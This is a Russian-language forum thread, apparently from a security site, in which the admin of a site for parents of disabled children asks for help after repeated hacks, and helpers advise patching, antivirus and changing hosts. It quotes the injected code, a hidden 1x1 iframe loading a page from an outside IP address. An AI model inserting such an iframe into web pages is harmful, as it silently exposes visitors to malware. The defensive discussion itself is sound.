Помогите пожалуйста - не пойму в чем дело. У меня сайт на RuWeb'е - я и автор и админ. "Веселье" началось 4 апреля, когда не открылась пользователям стартовая страница, а гостевая книга и форум были блокированы. Мне позвонила одна форумчанка (сайт для родителей с детьми-инвалидами) и сказала, что её на форум антивирус не пускает.
Я позвала специалиста и он из бекапа восстановил сайт. Но 6 апреля все повторилось снова. Теперь уже разбирались с хостерами сами.
Вот что они написали: "Ваш сайт взломан, в конце каждой страницы добавляется код
<!-- ~ --><iframe src="http://89.149.196.151/~xmobile/ru/index.php" width=1 height=1 style="display:none"></iframe>
Судя по всему, у Вас или используются нестойкие к взлому пароли(администратор хостинга/cms/пользователь базы данных) или используется cms с уязвимостями (особенно опасны в этом отношении самописные, в широко используемых cms типа joomla такие уязвимостей давно нет) или Ваш компьютер заражён вирусом, и пароли перехватываются.
В последнее время такие взомы участились из-за появившегося вируса, взлом происходит автоматически.
Вы чистите свой компьютер от вирусов, и меняете все свои пароли".
В общем, они все восстановили, я почистила комп DrWeb'ом и поменяла пароли.
1 раз зашла в админку! Все - через 2 часа ни форума ни гостевой снова не было.
Тогда прочитала информацию у Вас на сайте в какой последовательности и что надо делать. Прикрепила файлы о которых Geser и NickGolovko писали. Не пойму - система, кажется, без вирусов. Можно успокоиться и искать причины в другом?
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
никогда не нравился агент маил.ру из -за его шпионского поведения, возможно через него украли
сп2 поставьте на виндовс , и паровоз с обновлениями после него.
И фаэрвол нормальный .
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Система без СП2 и примерно 180 последующих патчей живёт в интернете по статистике не более получаса.
А почему никакой антивирусной программы у Вас не видно?
А проблема Ваша в общем и не Ваша, а Вашего хостера. Смените его, пока не поздно.
Это личность Вам знакома?
Wiethold Wagner
netdirekt e. K.
Kleyer Strasse 79 / Tor 14
60326 Frankfurt
что это?
C:\Documents and Settings\Fil-007\Мои документы\Файлы Mail.Ru Агента\[email protected]\[email protected]\фото чка.doc
никогда не нравился агент маил.ру из -за его шпионского поведения, возможно через него украли
сп2 поставьте на виндовс , и паровоз с обновлениями после него.
И фаэрвол нормальный .
Агент mail.ru - это сына, спасибо, что подсказали, сменит. Что такое файервол знаю. А вот что такое сп2 - подскажите пожалуйста.
Спасибо всем огромное!
в результате обновления получила вот эту ссылку на англ., которого не знаю
1. какой язык (кроме русского) знаете?
2. что конкретно Вы обновили? Если вы установили СП2, можете это страничку закрыть - этот апдейт закрывает уязвимость в обработке картинок формата JPEG, в СП2 эта проблема уже решена.
2. что конкретно Вы обновили? Если вы установили СП2, можете это страничку закрыть - этот апдейт закрывает уязвимость в обработке картинок формата JPEG, в СП2 эта проблема уже решена.
Обновляла сп1 установкой сп2 по той ссылке, что дал drongo
Обновляла сп1 установкой сп2 по той ссылке, что дал drongo
если установка СП2 прошла без проблем, то Вам осталось установить недостающие патчи (примерно 180 штук - но не пугайтесь, это должно произойти автоматически, если Вы воспользуетесь встроенной в Виндоуз рутиной) и какую-нибудь антивирусную программу и проверить Ваш компьютер.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: